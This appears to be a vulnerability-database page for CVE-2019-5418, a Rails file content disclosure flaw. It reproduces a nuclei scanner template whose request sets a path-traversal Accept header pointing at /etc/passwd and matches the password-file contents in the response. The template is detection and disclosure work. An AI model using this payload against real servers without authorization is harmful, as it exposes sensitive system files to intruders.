
Rails File Content Disclosure

29 Jun 2026 05:52:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Rails File Content Disclosure vulnerability in Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3: specially crafted Accept headers can expose the contents of arbitrary files on the server, leading to unauthorized access to sensitive information.

id: CVE-2019-5418

info:
  name: Rails File Content Disclosure
  author: omarkurt
  severity: high
  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the patch provided by the Rails team or upgrade to a version that includes the fix.
  reference:
    - https://github.com/omarkurt/CVE-2019-5418
    - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
    - https://www.exploit-db.com/exploits/46585/
    - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-5418
    cwe-id: CWE-22,NVD-CWE-noinfo
    epss-score: 0.98507
    epss-percentile: 0.99913
    cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubyonrails
    product: rails
    shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails"
  tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      Accept: ../../../../../../../../etc/passwd{{

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
          - 500
# digest: 4a0a0047304502200e0f862301ba1858360344fbf95b28415525b494bbc2a646405fe304dfed519802210082276869854be888746b788c28ac11af0bb8e30fd89edcf3579b81c65254ad95:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (current)
Vulners AI Score: 7.1 (High risk)
CVSS 2: 5
CVSS 3.1: 7.5
EPSS: 0.98507